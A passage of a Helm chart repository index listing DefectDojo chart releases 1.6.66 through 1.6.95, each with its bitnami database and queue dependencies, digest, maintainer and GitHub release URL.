"2023-11-13T18:08:41.45456017Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: d0c6c857d40149b5e0e90564e43c9cb2c75ab91254fa31ba9aa616351ad290c7 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.28.1/defectdojo-1.6.95.tgz + version: 1.6.95 + - apiVersion: v2 + appVersion: 2.28.0 + created: "2023-11-06T21:33:20.100303585Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 2cec9781a5fb0c87c2600795443d21f14fec007e0bccb4f96761681236dddbf8 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.28.0/defectdojo-1.6.94.tgz + version: 1.6.94 + - apiVersion: v2 + appVersion: 2.27.4 + created: "2023-10-30T16:00:17.944970619Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 8b28bf499e7f278b9d35ff0025c1479da5cfcb4437269289116dded3f1196f87 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.27.4/defectdojo-1.6.93.tgz + version: 1.6.93 + - apiVersion: v2 + appVersion: 2.27.3 + created: "2023-10-23T15:19:28.936950333Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: c9d462f22e59b5ac93e19664215eceb961c6fff13af3600ba32c76254c461bf5 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.27.3/defectdojo-1.6.92.tgz + version: 1.6.92 + - apiVersion: v2 + appVersion: 2.27.2 + created: "2023-10-16T14:29:36.660334329Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: ea33c296cb07ac94b7ea9b663136ddb5e771c5b99e9b27f6a3c312a368340719 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.27.2/defectdojo-1.6.91.tgz + version: 1.6.91 + - apiVersion: v2 + appVersion: 2.27.1 + created: "2023-10-10T17:42:33.184704146Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 4d301a8b6f20f1bcf973853741bc057aea74353cd18df7d616634e68ecf0223b + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.27.1/defectdojo-1.6.90.tgz + version: 1.6.90 + - apiVersion: v2 + appVersion: 2.27.0 + created: "2023-10-02T15:44:36.244146351Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 974df1d4e578213a14329ba0f99657bb04f056f0bc80d42c1695c84b3973c967 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.27.0/defectdojo-1.6.89.tgz + version: 1.6.89 + - apiVersion: v2 + appVersion: 2.26.4 + created: "2023-09-25T14:23:41.045684119Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: bd89f32eaa0f3d36630d0bfa61a369222b6627a0bc9eb84a4eef5245dff2c124 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.26.4/defectdojo-1.6.88.tgz + version: 1.6.88 + - apiVersion: v2 + appVersion: 2.26.3 + created: "2023-09-18T15:07:46.503081656Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: da9d08d01918abdfabd82198bbf60cc775d3d6440ab33f52306a50534b152150 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.26.3/defectdojo-1.6.87.tgz + version: 1.6.87 + - apiVersion: v2 + appVersion: 2.26.2 + created: "2023-09-13T02:52:03.266356052Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: afd57560300e0ae573e83e2f45bda3dd7d776505cc916a77dfaa91899e767904 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.26.2/defectdojo-1.6.86.tgz + version: 1.6.86 + - apiVersion: v2 + appVersion: 2.26.1 + created: "2023-09-11T17:28:56.020974571Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 8339c3061f585972e4da10b83bcf2b02b7d292b89c4b2e91a2ad054617f35c8b + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.26.1/defectdojo-1.6.85.tgz + version: 1.6.85 + - apiVersion: v2 + appVersion: 2.26.0 + created: "2023-09-05T18:31:28.431658547Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 5033cb9fa4fbb1aea2a8828f2b958ac3cad21e696ca45895474b23aefcd0c441 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.26.0/defectdojo-1.6.84.tgz + version: 1.6.84 + - apiVersion: v2 + appVersion: 2.25.4 + created: "2023-08-29T19:27:39.274334121Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 356839349b7dc3d82284a93cce4f72f28fe5fe4a6f3317afb5a926f60e33a53e + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.25.4/defectdojo-1.6.83.tgz + version: 1.6.83 + - apiVersion: v2 + appVersion: 2.25.3 + created: "2023-08-28T13:47:45.649957598Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: f6284a11c5b10fcb157790174fd0a4a1581f1f145107a8428ffec15038239e52 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.25.3/defectdojo-1.6.82.tgz + version: 1.6.82 + - apiVersion: v2 + appVersion: 2.25.2 + created: "2023-08-21T16:29:07.914529486Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 08c6ba47589c4ecdeb9b7f8a828a8a52fd2df5f508e7f4b26d08746fb5ef0e0d + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.25.2/defectdojo-1.6.81.tgz + version: 1.6.81 + - apiVersion: v2 + appVersion: 2.25.1 + created: "2023-08-14T18:02:07.594906232Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 8ccc55b692c05cd51e90078c86c9f16fb1e9d76b96a8dd66e3ebfddc8d2801b8 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.25.1/defectdojo-1.6.80.tgz + version: 1.6.80 + - apiVersion: v2 + appVersion: 2.25.0 + created: "2023-08-07T21:31:11.116186411Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 017f554e839df98cc03d815e799e3fca3069c5d1ddfe4d6baf96927e575723e0 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.25.0/defectdojo-1.6.79.tgz + version: 1.6.79 + - apiVersion: v2 + appVersion: 2.24.4 + created: "2023-07-31T13:34:18.330296696Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 0b7a06a9253d1889bb47c85e5a24c42043386c18194a5ff4ed0063804a90863a + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.24.4/defectdojo-1.6.78.tgz + version: 1.6.78 + - apiVersion: v2 + appVersion: 2.24.3 + created: "2023-07-24T15:17:47.805193413Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 0cb79db4b86df5dbb4debab0466c6861a2ec9ec5881feb6b95ae45111b37afc9 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.24.3/defectdojo-1.6.77.tgz + version: 1.6.77 + - apiVersion: v2 + appVersion: 2.24.2 + created: "2023-07-18T13:09:07.439666552Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 75aa62bda2ce03a54d760c2c044ac5ef568ef4ccf263edfa1a2a60a998c0d7f2 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.24.2/defectdojo-1.6.76.tgz + version: 1.6.76 + - apiVersion: v2 + appVersion: 2.24.1 + created: "2023-07-10T14:56:28.480907563Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: bc351d9ef6bd53930cbc5069cf683a79345f3758d1219ff6e16b83986be004c8 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.24.1/defectdojo-1.6.75.tgz + version: 1.6.75 + - apiVersion: v2 + appVersion: 2.24.0 + created: "2023-07-03T16:05:43.795239444Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 21142892354876dea5bbd9a09c92508ef07c0c218969ec8f9d6a0900b8caae76 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.24.0/defectdojo-1.6.74.tgz + version: 1.6.74 + - apiVersion: v2 + appVersion: 2.23.3 + created: "2023-06-26T15:46:08.1584091Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: f645bb279dcec51b6bc85ca9dbe31cbea895aec38b4ff4fc66f383ea779052e9 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.23.3/defectdojo-1.6.73.tgz + version: 1.6.73 + - apiVersion: v2 + appVersion: 2.23.2 + created: "2023-06-19T15:06:39.254121938Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 6fc4e01ab746b8ffae1916c88984e9d0200bf25dcd520e9b80596c055ec20768 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.23.2/defectdojo-1.6.72.tgz + version: 1.6.72 + - apiVersion: v2 + appVersion: 2.23.1 + created: "2023-06-12T14:41:24.27323292Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 920962cdf92a3a44471fdbf5f70d0e8f3ac694a5db4fb3ac883bb0c5c0f7a59e + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.23.1/defectdojo-1.6.71.tgz + version: 1.6.71 + - apiVersion: v2 + appVersion: 2.23.0 + created: "2023-06-05T14:15:03.314907422Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: c057430801c40de09c0955148f62bf324bf568ae5e65490b12787d7d78a1c714 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.23.0/defectdojo-1.6.70.tgz + version: 1.6.70 + - apiVersion: v2 + appVersion: 2.22.4 + created: "2023-05-29T18:39:44.254932131Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 75e0f7695f21ead17f816574aa4e94548a5cf01af1a5fa462259b1e8f52801ee + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.22.4/defectdojo-1.6.69.tgz + version: 1.6.69 + - apiVersion: v2 + appVersion: 2.22.3 + created: "2023-05-22T15:05:55.502880954Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: c0df6eb7d4e25803b0816f3f82339a579567368c4fdcd386e9d5c787e634ca2c + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.22.3/defectdojo-1.6.68.tgz + version: 1.6.68 + - apiVersion: v2 + appVersion: 2.22.2 + created: "2023-05-15T17:07:45.98041063Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 5de170a05fef7d76579093d4f6ca77d2b0fd2da68fb314d0aa39a0e430d6d868 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.22.2/defectdojo-1.6.67.tgz + version: 1.6.67 + - apiVersion: v2 + appVersion: 2.22.1 + created: "2023-05-08T16:27:26.349687821Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 1da9f71de6fc0bd8d68696dbcc1573fc3ec206d369dfef4ff236224dbce61359 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.22.1/defectdojo-1.6.66.tgz + version: 1.6.66 + - apiVersion: v2 + appVersion: 2.22.0 + created: "2023-05-01T16:24:23.656101749Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: 